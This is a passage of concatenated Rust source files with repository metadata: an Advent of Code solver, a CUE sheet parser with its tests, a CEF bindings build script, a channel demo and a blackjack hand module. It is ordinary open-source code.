u64) } } impl Into<(String, u32)> for Selection { fn into(self) -> (String, u32) { (self.selection, self.score) } }
true
d6d6c662d018baebd23e5bfde9bd3daedf53804b
Rust
Lakret/aoc2020
/src/d06.rs
UTF-8
1,533
3.40625
3
[]
no_license
use std::collections::HashSet; pub fn solve(input: &str) -> Option<Box<usize>> { let sum_of_counts = input .trim_end() .split("\n\n") .map(|group| group.chars().filter(|ch| *ch != '\n').collect::<HashSet<_>>().len()) .sum(); Some(Box::new(sum_of_counts)) } pub fn solve2(input: &str) -> Option<Box<usize>> { let sum_of_counts = input .trim_end() .split("\n\n") .map(|group| { let answers_per_person = group .split_ascii_whitespace() .map(|person| person.chars().collect::<HashSet<_>>()) .collect::<Vec<_>>(); answers_per_person .iter() .fold(answers_per_person[0].clone(), |all_yes, persons_answers| { all_yes.intersection(persons_answers).cloned().collect() }) .len() }) .sum(); Some(Box::new(sum_of_counts)) } #[cfg(test)] mod tests { use super::*; use std::fs; #[test] fn part_one_works_with_sample() { let input = fs::read_to_string("inputs/sample06").unwrap(); assert_eq!(solve(&input), Some(Box::new(11))); } #[test] fn part_two_works_with_sample() { let input = fs::read_to_string("inputs/sample06").unwrap(); assert_eq!(solve2(&input), Some(Box::new(6))); } #[test] fn part_one_solved() { let input = fs::read_to_string("inputs/d06").unwrap(); assert_eq!(solve(&input), Some(Box::new(6504))) } #[test] fn part_two_solved() { let input = fs::read_to_string("inputs/d06").unwrap(); assert_eq!(solve2(&input), Some(Box::new(3351))) } }
true
bc4a024fabc61af2ce4d81df31164215a66913be
Rust
gyng/rcue
/src/parser.rs
UTF-8
20,090
2.890625
3
[ "MIT" ]
permissive
use std::env; use std::fs::File; use std::io::{BufRead, BufReader}; use cue::{Command, Cue, CueFile, Track}; use errors::CueError; use util::{next_string, next_token, next_values, timestamp_to_duration}; /// Parses a CUE file at `path` into a [`Cue`](struct.Cue.html) struct. /// /// Strict mode (`strict: true`) will return a [`CueError`](../errors/enum.CueError.html) if invalid fields or extra lines are detected. /// When not in strict mode, bad lines and fields will be skipped, and unknown /// fields will be stored in [`Cue.unknown`](struct.Cue.html). /// /// # Example /// /// ``` /// use rcue::parser::parse_from_file; /// /// let cue = parse_from_file("test/fixtures/unicode.cue", true).unwrap(); /// assert_eq!(cue.title, Some("マジコカタストロフィ".to_string())); /// ``` /// /// # Failures /// /// Fails if the CUE file can not be parsed from the file. #[allow(dead_code)] pub fn parse_from_file(path: &str, strict: bool) -> Result<Cue, CueError> { let file = File::open(path)?; let mut buf_reader = BufReader::new(file); parse(&mut buf_reader, strict) } /// Parses a [`BufRead`](https://doc.rust-lang.org/std/io/trait.BufRead.html) into a [`Cue`](struct.Cue.html) struct. /// /// Strict mode will return [`CueError`](../errors/enum.CueError.html) if invalid fields or extra lines are detected. /// When not in strict mode, bad lines and fields will be skipped, and unknown /// fields will be stored in [`Cue.unknown`](struct.Cue.html). /// /// # Example /// /// ``` /// use rcue::parser::parse; /// use std::fs::File; /// use std::io::BufReader; /// /// let file = File::open("test/fixtures/unicode.cue").unwrap(); /// let mut buf_reader = BufReader::new(file); /// let cue = parse(&mut buf_reader, true).unwrap(); /// assert_eq!(cue.title, Some("マジコカタストロフィ".to_string())); /// ``` /// /// # Failures /// /// Fails if the CUE file can not be parsed. #[allow(dead_code)] pub fn parse(buf_reader: &mut dyn BufRead, strict: bool) -> Result<Cue, CueError> { let verbose = env::var_os("RCUE_LOG").map(|s| s == "1").unwrap_or(false); macro_rules! fail_if_strict { ($line_no:ident, $line:ident, $reason:expr) => { if strict { if verbose { println!( "Strict mode failure: did not parse line {}: {}\n\tReason: {:?}", $line_no + 1, $line, $reason ); } return Err(CueError::Parse(format!("strict mode failure: {}", $reason))); } }; } let mut cue = Cue::new(); fn last_file(cue: &mut Cue) -> Option<&mut CueFile> { cue.files.last_mut() } fn last_track(cue: &mut Cue) -> Option<&mut Track> { last_file(cue).and_then(|f| f.tracks.last_mut()) } for (i, line) in buf_reader.lines().enumerate() { if let Ok(ref l) = line { let token = tokenize_line(l); match token { Ok(Command::CdTextFile(path)) => { cue.cd_text_file = Some(path); } Ok(Command::Flags(flags)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().flags = flags; } else { fail_if_strict!(i, l, "FLAG assigned to no TRACK"); } } Ok(Command::Isrc(isrc)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().isrc = Some(isrc); } else { fail_if_strict!(i, l, "ISRC assigned to no TRACK"); } } Ok(Command::Rem(field, value)) => { let comment = (field, value); if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().comments.push(comment); } else if last_file(&mut cue).is_some() { last_file(&mut cue).unwrap().comments.push(comment); } else { cue.comments.push(comment); } } Ok(Command::File(file, format)) => { cue.files.push(CueFile::new(&file, &format)); } Ok(Command::Track(idx, mode)) => { if let Some(file) = last_file(&mut cue) { file.tracks.push(Track::new(&idx, &mode)); } else { fail_if_strict!(i, l, "TRACK assigned to no FILE"); } } Ok(Command::Title(title)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().title = Some(title); } else { cue.title = Some(title) } } Ok(Command::Performer(performer)) => { // this double check might be able to go away under non-lexical lifetimes if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().performer = Some(performer); } else { cue.performer = Some(performer); } } Ok(Command::Songwriter(songwriter)) => { if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().songwriter = Some(songwriter); } else { cue.songwriter = Some(songwriter); } } Ok(Command::Index(idx, time)) => { if let Some(track) = last_track(&mut cue) { if let Ok(duration) = timestamp_to_duration(&time) { track.indices.push((idx, duration)); } else { fail_if_strict!(i, l, "bad INDEX timestamp"); } } else { fail_if_strict!(i, l, "INDEX assigned to no track"); } } Ok(Command::Pregap(time)) => { if last_track(&mut cue).is_some() { if let Ok(duration) = timestamp_to_duration(&time) { last_track(&mut cue).unwrap().pregap = Some(duration); } else { fail_if_strict!(i, l, "bad PREGAP timestamp"); } } else { fail_if_strict!(i, l, "PREGAP assigned to no track"); } } Ok(Command::Postgap(time)) => { if last_track(&mut cue).is_some() { if let Ok(duration) = timestamp_to_duration(&time) { last_track(&mut cue).unwrap().postgap = Some(duration); } else { fail_if_strict!(i, l, "bad PREGAP timestamp"); } } else { fail_if_strict!(i, l, "POSTGAP assigned to no track"); } } Ok(Command::Catalog(id)) => { cue.catalog = Some(id); } Ok(Command::Unknown(line)) => { fail_if_strict!(i, l, &format!("unknown token -- {}", &line)); if last_track(&mut cue).is_some() { last_track(&mut cue).unwrap().unknown.push(line); } else { cue.unknown.push(line) } } _ => { fail_if_strict!(i, l, &format!("bad line -- {:?}", &line)); if verbose { println!("Bad line - did not parse line {}: {:?}", i + 1, l); } } } } } Ok(cue) } #[allow(dead_code)] fn tokenize_line(line: &str) -> Result<Command, CueError> { let mut chars = line.trim().chars(); let command = next_token(&mut chars); let command = if command.is_empty() { None } else { Some(command) }; match command { Some(c) => match c.to_uppercase().as_ref() { "REM" => { let key = next_token(&mut chars); let val = next_string(&mut chars, "missing REM value")?; Ok(Command::Rem(key, val)) } "CATALOG" => { let val = next_string(&mut chars, "missing CATALOG value")?; Ok(Command::Catalog(val)) } "CDTEXTFILE" => { let val = next_string(&mut chars, "missing CDTEXTFILE value")?; Ok(Command::CdTextFile(val)) } "TITLE" => { let val = next_string(&mut chars, "missing TITLE value")?; Ok(Command::Title(val)) } "FILE" => { let path = next_string(&mut chars, "missing path for FILE")?; let format = next_token(&mut chars); Ok(Command::File(path, format)) } "FLAGS" => { let flags = next_values(&mut chars); Ok(Command::Flags(flags)) } "ISRC" => { let val = next_token(&mut chars); Ok(Command::Isrc(val)) } "PERFORMER" => { let val = next_string(&mut chars, "missing PERFORMER value")?; Ok(Command::Performer(val)) } "SONGWRITER" => { let val = next_string(&mut chars, "missing SONGWRITER value")?; Ok(Command::Songwriter(val)) } "TRACK" => { let val = next_token(&mut chars); let mode = next_token(&mut chars); Ok(Command::Track(val, mode)) } "PREGAP" => { let val = next_token(&mut chars); Ok(Command::Pregap(val)) } "POSTGAP" => { let val = next_token(&mut chars); Ok(Command::Postgap(val)) } "INDEX" => { let val = next_token(&mut chars); let time = next_token(&mut chars); Ok(Command::Index(val, time)) } _ => { let rest: String = chars.collect(); if rest.is_empty() { Ok(Command::None) } else { Ok(Command::Unknown(line.to_string())) } } }, _ => Ok(Command::None), } } #[cfg(test)] mod tests { use super::*; use std::time::Duration; #[test] fn test_parsing_good_cue() { let cue = parse_from_file("test/fixtures/good.cue", true).unwrap(); assert_eq!(cue.comments.len(), 4); assert_eq!( cue.comments[0], ("GENRE".to_string(), "Alternative".to_string(),) ); assert_eq!(cue.comments[1], ("DATE".to_string(), "1991".to_string())); assert_eq!( cue.comments[2], ("DISCID".to_string(), "860B640B".to_string(),) ); assert_eq!( cue.comments[3], ("COMMENT".to_string(), "ExactAudioCopy v0.95b4".to_string(),) ); assert_eq!(cue.performer, Some("My Bloody Valentine".to_string())); assert_eq!(cue.songwriter, Some("foobar".to_string())); assert_eq!(cue.title, Some("Loveless".to_string())); assert_eq!(cue.cd_text_file, Some("./cdtextfile".to_string())); assert_eq!(cue.files.len(), 1); let file = &cue.files[0]; assert_eq!(file.file, "My Bloody Valentine - Loveless.wav"); assert_eq!(file.format, "WAVE"); assert_eq!(file.tracks.len(), 2); let track = &file.tracks[0]; assert_eq!(track.no, "01".to_string()); assert_eq!(track.format, "AUDIO".to_string()); assert_eq!(track.songwriter, Some("barbaz bax".to_string())); assert_eq!(track.title, Some("Only Shallow".to_string())); assert_eq!(track.performer, Some("My Bloody Valentine".to_string())); assert_eq!(track.indices.len(), 1); assert_eq!(track.indices[0], ("01".to_string(), Duration::new(0, 0))); assert_eq!(track.isrc, Some("USRC17609839".to_string())); assert_eq!(track.flags, vec!["DCP", "4CH", "PRE", "SCMS"]); } #[test] fn test_parsing_unicode() { let cue = parse_from_file("test/fixtures/unicode.cue", true).unwrap(); assert_eq!(cue.title, Some("マジコカタストロフィ".to_string())); } #[test] fn test_case_sensitivity() { let cue = parse_from_file("test/fixtures/case_sensitivity.cue", true).unwrap(); assert_eq!(cue.title, Some("Loveless".to_string())); assert_eq!(cue.performer, Some("My Bloody Valentine".to_string())); } #[test] fn test_bad_intentation() { let cue = parse_from_file("test/fixtures/bad_indentation.cue", true).unwrap(); assert_eq!(cue.title, Some("Loveless".to_string())); assert_eq!(cue.files.len(), 1); assert_eq!(cue.files[0].tracks.len(), 2); assert_eq!( cue.files[0].tracks[0].title, Some("Only Shallow".to_string()) ); } #[test] fn test_unknown_field_lenient() { let cue = parse_from_file("test/fixtures/unknown_field.cue", false).unwrap(); assert_eq!(cue.unknown[0], "FOO WHAT 12345"); } #[test] fn test_unknown_field_strict() { let cue = parse_from_file("test/fixtures/unknown_field.cue", true); assert!(cue.is_err()); } #[test] fn test_empty_lines_lenient() { let cue = parse_from_file("test/fixtures/empty_lines.cue", false).unwrap(); assert_eq!(cue.comments.len(), 4); assert_eq!(cue.files.len(), 1); assert_eq!(cue.files[0].tracks.len(), 2); } #[test] fn test_empty_lines_strict() { let cue = parse_from_file("test/fixtures/empty_lines.cue", true); assert!(cue.is_err()); } #[test] fn test_duplicate_comment() { let cue = parse_from_file("test/fixtures/duplicate_comment.cue", true).unwrap(); assert_eq!(cue.comments.len(), 5); assert_eq!(cue.comments[1], ("DATE".to_string(), "1991".to_string())); assert_eq!(cue.comments[2], ("DATE".to_string(), "1992".to_string())); } #[test] fn test_duplicate_title() { let cue = parse_from_file("test/fixtures/duplicate_title.cue", true).unwrap(); assert_eq!(cue.title, Some("Loveless 2".to_string())); } #[test] fn test_duplicate_track() { let cue = parse_from_file("test/fixtures/duplicate_track.cue", true).unwrap(); assert_eq!(cue.files[0].tracks[0], cue.files[0].tracks[1]); } #[test] fn test_duplicate_file() { let cue = parse_from_file("test/fixtures/duplicate_file.cue", true).unwrap(); assert_eq!(cue.files.len(), 2); assert_eq!(cue.files[0], cue.files[1]); } #[test] fn test_bad_index_lenient() { let cue = parse_from_file("test/fixtures/bad_index.cue", false).unwrap(); assert_eq!(cue.files[0].tracks[0].indices.len(), 0); } #[test] fn test_bad_index_strict() { let cue = parse_from_file("test/fixtures/bad_index.cue", true); assert!(cue.is_err()); } #[test] fn test_bad_index_timestamp_lenient() { let cue = parse_from_file("test/fixtures/bad_index_timestamp.cue", false).unwrap(); assert_eq!(cue.files[0].tracks[0].indices.len(), 0); } #[test] fn test_bad_index_timestamp_strict() { let cue = parse_from_file("test/fixtures/bad_index_timestamp.cue", true); assert!(cue.is_err()); } #[test] fn test_pregap_postgap() { let cue = parse_from_file("test/fixtures/pregap.cue", true).unwrap(); assert_eq!(cue.files[0].tracks[0].pregap, Some(Duration::new(1, 0))); assert_eq!(cue.files[0].tracks[0].postgap, Some(Duration::new(2, 0))); } #[test] fn test_bad_pregap_timestamp_strict() { let cue = parse_from_file("test/fixtures/bad_pregap_timestamp.cue", true); assert!(cue.is_err()); } #[test] fn test_bad_pregap_timestamp_lenient() { let cue = parse_from_file("test/fixtures/bad_pregap_timestamp.cue", false).unwrap(); assert!(cue.files[0].tracks[0].pregap.is_none()); } #[test] fn test_bad_postgap_timestamp_strict() { let cue = parse_from_file("test/fixtures/bad_postgap_timestamp.cue", true); assert!(cue.is_err()); } #[test] fn test_bad_postgap_timestamp_lenient() { let cue = parse_from_file("test/fixtures/bad_postgap_timestamp.cue", false).unwrap(); assert!(cue.files[0].tracks[0].postgap.is_none()); } #[test] fn test_catalog() { let cue = parse_from_file("test/fixtures/catalog.cue", true).unwrap(); assert_eq!(cue.catalog, Some("TESTCATALOG-ID 64".to_string())); } #[test] fn test_comments() { let cue = parse_from_file("test/fixtures/comments.cue", true).unwrap(); assert_eq!(cue.comments.len(), 4); assert_eq!(cue.files[0].comments.len(), 1); assert_eq!(cue.files[0].tracks[0].comments.len(), 1); assert_eq!(cue.files[0].tracks[1].comments.len(), 2); assert_eq!( cue.files[0].tracks[1].comments[0], ("TRACK".to_string(), "2".to_string(),) ); assert_eq!( cue.files[0].tracks[1].comments[1], ("TRACK".to_string(), "2.1".to_string(),) ); } #[test] fn test_orphan_track_strict() { let cue = parse_from_file("test/fixtures/orphan_track.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_track_lenient() { let cue = parse_from_file("test/fixtures/orphan_track.cue", false).unwrap(); assert_eq!(cue.files.len(), 0); } #[test] fn test_orphan_index_strict() { let cue = parse_from_file("test/fixtures/orphan_index.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_index_lenient() { let cue = parse_from_file("test/fixtures/orphan_index.cue", false).unwrap(); assert_eq!(cue.files[0].tracks.len(), 1); assert_eq!(cue.files[0].tracks[0].indices.len(), 1); assert_eq!( cue.files[0].tracks[0].indices[0], ("01".to_string(), Duration::new(257, 693333333,),) ); } #[test] fn test_orphan_pregap_strict() { let cue = parse_from_file("test/fixtures/orphan_pregap.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_pregap_lenient() { let cue = parse_from_file("test/fixtures/orphan_pregap.cue", false).unwrap(); assert_eq!(cue.files[0].tracks.len(), 1); assert!(cue.files[0].tracks[0].pregap.is_none()); } #[test] fn test_orphan_postgap_strict() { let cue = parse_from_file("test/fixtures/orphan_postgap.cue", true); assert!(cue.is_err()); } #[test] fn test_orphan_postgap_lenient() { let cue = parse_from_file("test/fixtures/orphan_postgap.cue", false).unwrap(); assert_eq!(cue.files[0].tracks.len(), 1); assert!(cue.files[0].tracks[0].pregap.is_none()); } #[test] fn test_missing_file() { let cue = parse_from_file("test/fixtures/missing.cue.missing", true); assert!(cue.is_err()); } #[test] fn test_bare_file() { use std::io; assert!(parse(&mut io::Cursor::new(b"FILE"), true).is_err()); } }
true
0b65979d722623554e3a4b08e49d3802e46553be
Rust
Excloudx6/freq-word-counter-rust
/src/utils/traverse.rs
UTF-8
6,161
3
3
[ "Apache-2.0", "MIT" ]
permissive
use anyhow::Result; use serde::Serialize; use std::fmt::Display; use std::path::PathBuf; const STDIN: &str = "-"; #[derive(Debug, Clone, PartialEq, Eq, Hash)] #[non_exhaustive] pub enum Input { FsGlob { pattern: String, ignore_case: bool }, FsPath(PathBuf), Stdin, String(String), } impl Serialize for Input { fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error> where S: serde::Serializer, { serializer.collect_str(self) } } impl Display for Input { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Input::FsGlob { pattern, ignore_case: _, } => { write!(f, "{}", pattern) } Input::FsPath(path) => { write!(f, "{}", path.to_str().unwrap_or_default()) } Input::Stdin => { write!(f, "stdin") } Input::String(_) => { write!(f, "raw input string") } } } } impl Input { pub fn new(value: &str, glob_ignore_case: bool) -> Self { if value == STDIN { Self::Stdin } else { let is_glob = glob::Pattern::escape(value) != value; if is_glob { Self::FsGlob { pattern: value.to_owned(), ignore_case: glob_ignore_case, } } else { Self::FsPath(value.into()) } } } // pub async fn get_contents( // &self, // file_type_hint: Option<FileType>, // skip_missing: bool, // ) -> Result<Vec<InputContent>> { // use Input::*; // match self { // // TODO: should skip_missing also affect URLs? // RemoteUrl(url) => Ok(vec![Self::url_contents(url).await?]), // FsGlob { // pattern, // ignore_case, // } => Ok(Self::glob_contents(pattern, *ignore_case).await?), // FsPath(path) => { // let content = Self::path_content(&path).await.with_context(|| { // format!( // "Failed to read file: `{}`", // path.to_str().unwrap_or("<MALFORMED PATH>") // ) // }); // match content { // Ok(input_content) => Ok(vec![input_content]), // Err(_) if skip_missing => Ok(vec![]), // Err(arg) => Err(anyhow!(arg)), // } // } // Stdin => Ok(vec![Self::stdin_content(file_type_hint).await?]), // String(s) => Ok(vec![Self::string_content(s, file_type_hint)]), // } // } } // TODO: Make that a stream of files? // async fn glob_contents(path_glob: &str, ignore_case: bool) -> Result<Vec<Input>> { // let mut contents = vec![]; // let glob_expanded = tilde(&path_glob); // let mut match_opts = glob::MatchOptions::new(); // match_opts.case_sensitive = !ignore_case; // for entry in glob_with(&glob_expanded, match_opts)? { // match entry { // Ok(path) => { // contents.push(content); // } // Err(e) => println!("{:?}", e), // } // } // Ok(contents) // } /// Return readers for all matches from a slice of inputs // pub async fn files_stream<T: Read>(inputs: &[Input]) -> Result<HashSet<T>> { // todo!(); // // // extract input contents // // for input in inputs.iter().cloned() { // // let sender = contents_tx.clone(); // // tokio::spawn(async move { // // let contents = input.get_contents(None, skip_missing_inputs).await; // // sender.send(contents).await // // }); // // } // // // receiver will get None once all tasks are done // // drop(contents_tx); // // // extract links from input contents // // let mut extract_link_handles = vec![]; // // while let Some(result) = contents_rx.recv().await { // // for input_content in result? { // // let base_url = base_url.clone(); // // let handle = // // tokio::task::spawn_blocking(move || extract_links(&input_content, base_url)); // // extract_link_handles.push(handle); // // } // // } // // // Note: we could dispatch links to be checked as soon as we get them, // // // instead of building a HashSet with all links. // // // This optimization would speed up cases where there's // // // a lot of inputs and/or the inputs are large (e.g. big files). // // let mut collected_links: HashSet<Request> = HashSet::new(); // // for handle in extract_link_handles { // // let links = handle.await?; // // collected_links.extend(links); // // } // // Ok(collected_links) // } /*#[cfg(test)] mod test { use super::*; #[tokio::test] async fn test_collect_links() -> Result<()> { // let dir = tempfile::tempdir()?; // let file_path = dir.path().join("f"); // let file_glob_1_path = dir.path().join("glob-1"); // let file_glob_2_path = dir.path().join("glob-2"); // let mut file = File::create(&file_path)?; // let mut file_glob_1 = File::create(file_glob_1_path)?; // let mut file_glob_2 = File::create(file_glob_2_path)?; // let inputs = vec![ // // Input::String(TEST_STRING.to_string()), // Input::FsPath(file_path), // Input::FsGlob { // pattern: dir.path().join("glob*").to_str().unwrap().to_string(), // ignore_case: true, // }, // ]; // TODO // let found_files: HashSet<Box<Read>> = files_stream(&inputs).await?.collect(); // // let expected_files = vec![file_path, file_glob_1_path, file_glob_2_path, file, file_glob_1, file_glob_2, expected_files]; // assert_eq!(found_files, expected_files); Ok(()) } }*/
true
7c28e7e518c8a7bcfa68c73e2b92d34d25753221
Rust
maxueshan/quick_get_start_rust
/src/bin/mpsc_test.rs
UTF-8
445
3.40625
3
[ "MIT" ]
permissive
use std::sync::mpsc; use std::thread; fn main() { // 创建一个通道 let (tx, rx): (mpsc::Sender<i32>, mpsc::Receiver<i32>) = mpsc::channel(); // 创建线程用于发送消息 thread::spawn(move || { // 发送一个消息,此处是数字id tx.send(1).unwrap(); }); // 在主线程中接收子线程发送的消息并输出 println!("receive {}", rx.recv().unwrap()); } //输出 receive 1
true
5f0c4a3fae092772b258809a8bb279b00788fa3b
Rust
peter-suggate/cef-sys
/build.rs
UTF-8
5,019
2.59375
3
[ "MIT" ]
permissive
extern crate bindgen; use std::env; use std::fs; use std::io::Write; use std::path::PathBuf; fn cef_dir() -> PathBuf { PathBuf::from(env_var("CEF_DIR")) } // The wrapper file is the entry point to the native code we are creating bindings for. fn create_wrapper_file() { let wrapper_file = PathBuf::from(env_var("CARGO_MANIFEST_DIR")).join("wrapper.h"); let cef_dir = cef_dir(); if !wrapper_file.is_file() { let file = fs::File::create(wrapper_file).expect("Could not create wrapper.h file"); let mut file_writer = std::io::LineWriter::new(file); // We want to include all capi headers let include_files = fs::read_dir(cef_dir.join("include").join("capi")).unwrap(); for entry_res in include_files { let entry = entry_res.unwrap(); // If it's a header, include it in the file as a string relative to cef_dir if entry.file_name().to_str().unwrap().ends_with(".h") { let relative_name = entry .path() .strip_prefix(&cef_dir) .unwrap() .to_str() .unwrap() .replace("\\", "/"); writeln!(&mut file_writer, "#include \"{}\"", relative_name) .expect("Could not write #include to wrapper.h"); } } } } fn generate_bindings() { // Write the bindings to the $OUT_DIR/bindings.rs file. let out_path = PathBuf::from(env_var("OUT_DIR")); // if !out_path.is_file() { // The bindgen::Builder is the main entry point // to bindgen, and lets you build up options for // the resulting bindings. let bindings = bindgen::Builder::default() // The input header we would like to generate // bindings for. .header("wrapper.h") .clang_arg("--include-directory") .clang_arg(cef_dir().to_str().unwrap()) // Some of the c api includes seem to pull in C++! .clang_arg("-x") .clang_arg("c++") .layout_tests(false) .derive_default(true) // TODO: waiting for fix of https://github.com/servo/rust-bindgen/issues/648 .opaque_type("tagMONITORINFOEXA") .rustfmt_bindings(true) // Cef is huge! Pull in only the things we need or else the generated bindings is very large. .whitelist_function("cef_execute_process") .whitelist_function("cef_initialize") .whitelist_function("cef_do_message_loop_work") .whitelist_function("cef_browser_host_create_browser") .whitelist_function("cef_browser_host_create_browser_sync") .whitelist_function("cef_process_message_create") .whitelist_function("cef_string_utf8_to_utf16") .whitelist_function("cef_string_utf16_to_utf8") .whitelist_function("cef_v8value_create_undefined") .whitelist_function("cef_v8value_create_null") .whitelist_function("cef_v8value_create_bool") .whitelist_function("cef_v8value_create_int") .whitelist_function("cef_v8value_create_uint") .whitelist_function("cef_v8value_create_double") .whitelist_function("cef_v8value_create_date") .whitelist_function("cef_v8value_create_string") .whitelist_function("cef_v8value_create_object") .whitelist_function("cef_v8value_create_array") .whitelist_function("cef_v8value_create_array_buffer") .whitelist_function("cef_v8value_create_function") // Finish the builder and generate the bindings. .generate() // Unwrap the Result and panic on failure. .expect("Unable to generate bindings"); bindings .write_to_file(out_path.join("bindings.rs")) .expect("Couldn't write bindings!"); // } } enum Platform { Windows, Mac, Linux, } fn get_platform() -> Platform { match env::var("TARGET").unwrap().split('-').nth(2).unwrap() { "win32" | "windows" => Platform::Windows, "darwin" => Platform::Mac, "linux" => Platform::Linux, other => panic!("Sorry, platform \"{}\" is not supported by CEF.", other), } } fn get_build_type() -> String { match env::var("PROFILE").unwrap().as_str() { "release" => String::from("Release"), _ => String::from("Debug"), } } fn config_linker() { let lib_name = match get_platform() { Platform::Mac => return, // CEF_PATH is not necessarily needed for Mac Platform::Windows => "libcef", Platform::Linux => "cef", }; // Tell the linker the lib name and the path println!("cargo:rustc-link-lib={}", lib_name); println!( "cargo:rustc-link-search={}", cef_dir().join(get_build_type()).to_str().unwrap() ); } fn main() { create_wrapper_file(); generate_bindings(); config_linker(); } fn env_var<K: AsRef<std::ffi::OsStr>>(key: K) -> String { env::var(&key).expect(&format!("Unable to find env var {:?}", key.as_ref())) }
true
ce73e9123687cb380e7bb60b16e8a310d552b843
Rust
kyle-mccarthy/blackjack-rs
/src/blackjack/blackjack_hand.rs
UTF-8
8,331
3.0625
3
[]
no_license
use crate::blackjack::hand_value::{HandValue, WithHandValue}; use crate::blackjack::player::PlayerType; use crate::blackjack::wager::{Wager, WithWager}; use crate::cards::{Card, Hand}; use std::sync::Arc; pub enum HandState { Default, WagerPlaced, CardsDealt, HandPlayed, } pub enum ResultsState { Default, Natural, Pushed, Lost, Won, Busted, } // @todo likely need to split up the states even more -- consider individual wager state + pay state?? pub struct BlackjackHand { hand: Hand, player_type: PlayerType, state: HandState, result_state: ResultsState, wager: Wager, } impl BlackjackHand { pub fn new(player_type: PlayerType) -> BlackjackHand { BlackjackHand { player_type, hand: Hand::new(), state: HandState::Default, result_state: ResultsState::Default, wager: Wager::new(), } } pub fn with_cards( player_type: PlayerType, cards: Vec<Arc<Card>>, ) -> BlackjackHand { BlackjackHand { player_type, hand: Hand::with_cards(cards), state: HandState::Default, result_state: ResultsState::Default, wager: Wager::new(), } } pub fn get_state(&self) -> &HandState { &self.state } pub fn set_state(&mut self, state: HandState) { self.state = state; } pub fn add_card(&mut self, card: Arc<Card>) { self.hand.add_card(card) } pub fn add_cards(&mut self, cards: Vec<Arc<Card>>) { self.hand.add_cards(cards); } pub fn get_cards(&self) -> &Vec<Arc<Card>> { self.hand.get_cards() } pub fn get_card_count(&self) -> usize { self.hand.get_card_count() } pub fn can_split(&self) -> bool { match self.player_type { PlayerType::Dealer => false, PlayerType::Player => { self.hand.get_card_count() == 2 && self.hand.get_cards().get(0) == self.hand.get_cards().get(1) } } } pub fn split(&mut self) -> Option<[BlackjackHand; 2]> { if self.can_split() && !self.is_dealer() { let player_type = self.player_type.clone(); let cards = self.hand.get_cards(); return Some([ BlackjackHand::with_cards( player_type.clone(), vec![cards.get(0).unwrap().clone()], ), BlackjackHand::with_cards( player_type, vec![cards.get(1).unwrap().clone()], ), ]); } None } pub fn can_double_down(&self) -> bool { match &self.player_type { PlayerType::Dealer => false, PlayerType::Player => self.hand.get_card_count() == 2, } } pub fn can_hit(&self) -> bool { match self.player_type { PlayerType::Player => match self.get_value() { Some(HandValue::V(n)) => n < 21, Some(HandValue::Ace(_, high)) => high < 21, _ => false, }, PlayerType::Dealer => match self.get_value() { Some(HandValue::V(n)) => n < 17, Some(HandValue::Ace(low, high)) => low <= 17 || high < 17, // hit on soft 17 _ => false, }, } } pub fn is_dealer(&self) -> bool { self.player_type == PlayerType::Dealer } pub fn reset(&mut self) { self.hand.reset_cards(); self.state = HandState::Default; self.result_state = ResultsState::Default; self.wager.reset_wager(); } } pub trait ResultState { fn set_result_state(&mut self, state: ResultsState); fn get_result_state(&self) -> &ResultsState; fn set_natural(&mut self) { self.set_result_state(ResultsState::Natural); } fn set_busted(&mut self) { self.set_result_state(ResultsState::Busted); } fn set_lost(&mut self) { self.set_result_state(ResultsState::Lost); } fn set_won(&mut self) { self.set_result_state(ResultsState::Won); } fn set_pushed(&mut self) { self.set_result_state(ResultsState::Pushed); } fn did_win(&self) -> bool { match self.get_result_state() { ResultsState::Won => true, ResultsState::Natural => true, _ => false, } } } impl ResultState for BlackjackHand { fn set_result_state(&mut self, state: ResultsState) { self.result_state = state; } fn get_result_state(&self) -> &ResultsState { &self.result_state } } impl WithWager for BlackjackHand { fn get_mut_wager(&mut self) -> &mut Wager { &mut self.wager } fn get_wager(&self) -> &Wager { &self.wager } fn set_wagered_value(&mut self, wager: u32) { self.wager.set_wager(wager); self.set_state(HandState::WagerPlaced) } } impl WithHandValue for BlackjackHand { fn get_cards(&self) -> &Vec<Arc<Card>> { self.hand.get_cards() } } #[cfg(test)] mod tests { use crate::cards::{Card, Hand, Rank, Suit}; use super::*; #[test] fn it_can_split() { let card = Arc::new(Card::from(Suit::Club, Rank::Five)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Five)); let mut player = BlackjackHand::new(PlayerType::Player); let mut dealer = BlackjackHand::new(PlayerType::Dealer); player.add_card(card.clone()); player.add_card(card2.clone()); dealer.add_card(card); dealer.add_card(card2); assert!(player.can_split()); assert!(!dealer.can_split()); } #[test] fn it_does_split() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Eight)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Eight)); let mut hand = BlackjackHand::new(PlayerType::Player); hand.add_card(card1); hand.add_card(card2); let hands = hand.split(); assert!(hands.is_some()); let hands = hands.unwrap(); let hand1 = hands.get(0).unwrap(); let hand2 = hands.get(1).unwrap(); assert_eq!(hand1.get_card_count(), 1); assert_eq!(hand2.get_card_count(), 1); let card1 = hand1.get_cards().first().unwrap(); let card2 = hand2.get_cards().first().unwrap(); assert_eq!(card1, card2); } #[test] fn can_double_down() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Five)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Six)); let player = BlackjackHand::with_cards( PlayerType::Player, vec![card1.clone(), card2.clone()], ); let dealer = BlackjackHand::with_cards(PlayerType::Dealer, vec![card1, card2]); assert!(player.can_double_down()); assert!(!dealer.can_double_down()); } #[test] fn can_hit_player() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Five)); let card2 = Arc::new(Card::from(Suit::Club, Rank::Seven)); let mut player = BlackjackHand::with_cards(PlayerType::Player, vec![card1, card2]); assert!(player.can_hit()); let card3 = Arc::new(Card::from(Suit::Club, Rank::King)); player.add_card(card3); assert!(!player.can_hit()); } #[test] fn can_hit_dealer() { let card1 = Arc::new(Card::from(Suit::Club, Rank::Three)); let card2 = 